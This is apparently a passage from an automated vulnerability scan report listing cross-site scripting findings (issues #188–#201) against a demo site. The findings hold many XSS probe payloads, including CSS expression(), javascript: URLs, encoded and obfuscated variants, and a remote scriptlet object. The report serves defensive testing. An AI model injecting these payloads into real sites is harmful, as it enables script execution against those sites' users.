href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #188\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <DIV STYLE=\"background-image: url(javascript:alert('\nXSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #189\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<DIV STYLE=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\\n0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\\n006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\\n0029\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #190Scan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <DIV STYLE=\"background-image: url(&#1;javascript:\nalert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #191\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <DIV STYLE=\"width: expression(alert('XSS'));\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #192\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #193\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #194\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <XSS STYLE=\"xss:expression(alert('XSS'))\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #195\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io exp/*<A STYLE='no\\xss:noxss(\"*//*\");xss:&#101;x&#x2F;*\nXSS*//*/*/pression(alert(\"XSS\"))'>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #196\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE\n>Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #197\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE>.XSS{background-image:url(\"javascript:alert('XSS'\n)\");}</STYLE><A CLASS=XSS></A>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79Issue Number #198\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <STYLE type=\"text/css\">BODY{background:url(\"javascript\n:alert('XSS')\")}</STYLE>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #199\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![\nendif]-->\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #200\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <BASE HREF=\"javascript:alert('XSS');//\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #201\nScan Cross Site ScriptingSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://soapui.org\n/scriptlet.html\"></OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 